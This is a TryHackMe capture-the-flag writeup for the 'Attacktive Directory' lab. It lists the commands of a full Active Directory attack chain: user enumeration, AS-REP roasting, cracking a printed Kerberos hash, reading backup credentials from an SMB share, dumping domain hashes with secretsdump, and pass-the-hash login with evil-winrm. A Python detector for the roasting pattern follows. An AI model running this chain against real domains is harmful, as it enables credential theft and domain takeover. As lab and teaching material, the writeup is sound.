Attacktive Directory THM Writeup

python3 -m pip install impacket
python3 -m pip install .
sudo nmap -sV -O 10.10.118.181
enum4linux 10.10.118.181
./kerbrute_linux_amd64 userenum -d spookysec.local --dc 10.10.118.181 ../Wordlists/userlist.txt
cd /home/kali/Downloads/impacket-master/build/scripts-3.9
./GetNPUsers.py spookysec.local/svc-admin -no-pass
cd /home/kali/Downloads/Wordlists
hashcat -m 18200 '$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:479e4f94a068ef144a788436c7df94e7$7a05e6b2e85dff303406c56f1c85feefe6ea6b5fbbe6a9d9cc59cf190add2502d2b8906eabe9d1f6a49cf90a707f94118477754fc7c04c2644824d35d25b11ee5dcc1bb519b78367d172374fdab521fb236fbd0f4dccb6d3f3a9a7c5ea0b1223a7a29adc38665abb144feff9f0b539b26f2f32d49d0a6820fd05c6b64ffe611df26d0adb0d05b7eab01639cdfc2d7ffaab92e94c7c077eaeeef14e9ce69d4088aabba32f6bb8c10235e0b03c496c409257c64d839e397e9c979346557f0d675cdb9f97224ba0954be9540f91cd7ea7be20ea745a9bf393807201ff9ff2685ac1f801dd77d2c049249f34a3e6509be3eb821b' -a 0 rockyou.txt
rdesktop 10.10.118.181
smbclient -L \\\\10.10.118.181 -U 'svc-admin'
smbclient \\\\10.10.118.181\\backup -U 'svc-admin'
more backup_credentials.txt
echo <string> | base64 -d
(Get-Acl 'dc=spookysec,dc=local').access | Where {$_.IdentityReference -like "*backup*"}
python3 /home/kali/Downloads/impacket-master/examples/secretsdump.py -just-dc <username>:<password>@10.10.118.181
NTLM hashes redacted as per THM’s writeup guidance
sudo gem install evil-winrm (alt: sudo apt install evil-winrm)
evil-winrm -i <target IP> -u <username> -H <hash>
Set-Location ..\Desktop
Get-ChildItem
Get-Content root.txt
NTLM hash & flag redacted as per THM’s writeup guidance
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties * | Select-Object SAMAccountName
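
The Get-ADUser query above lists accounts that do not require Kerberos pre-authentication, the setting that let GetNPUsers.py obtain an AS-REP for svc-admin earlier. As an added example (not part of the original writeup), this Python script flags the matching domain controller log pattern: a successful event 4768 with PreAuthType 0. The JSON-lines export format, the function name and the sample events are assumptions constructed for illustration.

```python
import json

# Constructed sample: Security event 4768 (Kerberos TGT request) records, one
# JSON object per line. The export format and all values are assumptions.
SAMPLE_EVENTS = """\
{"EventID": 4768, "TargetUserName": "svc-admin", "IpAddress": "::ffff:192.0.2.15", "TicketEncryptionType": "0x17", "PreAuthType": "0", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "backup", "IpAddress": "::ffff:192.0.2.20", "TicketEncryptionType": "0x12", "PreAuthType": "2", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "nosuchuser", "IpAddress": "::ffff:192.0.2.15", "TicketEncryptionType": "0xffffffff", "PreAuthType": "-", "Status": "0x6"}
{"EventID": 4624, "TargetUserName": "svc-admin", "IpAddress": "192.0.2.20"}
not-json debris
"""

RC4_HMAC = 0x17  # etype 23, as in the $krb5asrep$23$ hash above


def find_no_preauth_tgts(lines):
    """Return one finding per successful TGT issued without pre-authentication."""
    findings = []
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip lines that are not JSON
        if not isinstance(ev, dict) or ev.get("EventID") != 4768:
            continue  # only TGT requests are relevant
        if str(ev.get("Status", "")).lower() != "0x0":
            continue  # failed requests issued no ticket
        if str(ev.get("PreAuthType")) != "0":
            continue  # pre-authentication was performed
        try:
            etype = int(str(ev.get("TicketEncryptionType", "")), 16)
        except ValueError:
            etype = None  # unparseable etype: still report the event
        ip = str(ev.get("IpAddress", ""))
        findings.append({
            "user": ev.get("TargetUserName", ""),
            # strip the IPv4-mapped IPv6 prefix the DC logs in front of the address
            "source": ip[7:] if ip.startswith("::ffff:") else ip,
            "rc4": etype == RC4_HMAC,  # reply encrypted with RC4-HMAC
        })
    return findings


if __name__ == "__main__":
    for finding in find_no_preauth_tgts(SAMPLE_EVENTS.splitlines()):
        print(finding)
```

Any account this reports should also appear in the Get-ADUser output; clearing "Do not require Kerberos preauthentication" on the account removes both.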

Rich


I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from work or the lab.